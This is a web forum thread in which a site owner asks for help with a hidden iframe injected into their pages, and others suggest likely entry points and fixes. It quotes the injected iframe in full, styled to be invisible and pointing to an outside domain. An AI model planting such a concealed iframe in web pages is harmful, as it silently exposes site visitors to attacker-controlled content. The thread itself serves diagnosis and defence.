Help: Hacker Attack
There is a mysterious piece of code being added to my websites (header, footer, both).
The code looks like
Can anyone tell me how could this happen as I have searched all my php files and nothing of the sort is there.
<iframe width="480" height="60" style="border: 0px none ; position: relative; top: 0px; left: -500px; opacity: 0;" src="http://profitooltip.biz/blog/feed.html"/>
Please help ASAP
Have you tried disabling JS in your browser to see if the element is still created? Do you display user input on your site. if so, does any of it contain JS or links to JS?
There's not much anyone can do without seeing your code... or at least a link to the site in question.
Do you run any scripts on this site which you did not author yourself? Are they not the very latest versions of those scripts? If you answered yes to those questions, that's a likely entry point.
The other is through the whole server being compromised through someone else's account or vulnerable software.
Contact the web host.
Nothing is being added
Send you my url in PM.
Actually the sites are on two separate servers. One in UK and other server in Germany.
Also, I have no 3rd party software on my pages except Google Analytics and I have just updated my code but still the problem persists.
Ok its something called an IFrame attack.
I cant understand the entry point.
Can you please point at how this could have happened.
Malicious code adds itself to page's footer/header.
But surely i havent given out my FTP details to anyone.
I also add mysql_real_escape_string to all my database insertions.
I have no PM. :confused:
Originally Posted by khuramyz
I think i sent it to you in something else.
Well it seems like iframe attack and may have stemmed from xss.
I am checking everything on my own.
If you have anything about how iframe attacks generate and how I can prevent them from my site then please share.
Ummm searching. Anyone with personal experience here ?
Basically you allowed the hacker to write to your filesystem. Most likely, you have a script somewhere which does something with the filesystem carelessly.
Sitepoint has a web security forum. You should read through some existing threads to get ideas on where and how to look for the hole.
Be aware, the hole could very well be another website hosted on the same shared webserver.
I got a Plesk server with every site having its own ftp. Sites dont mingle. But its still on the site.
I asked for apache error logs but nothing there.
I dont know what to do. :(
There could be a variety of reasons.
Remove that line of code, change your FTP password, see if it still persists.
Change the CHMOD of the file in question and see if it still persists.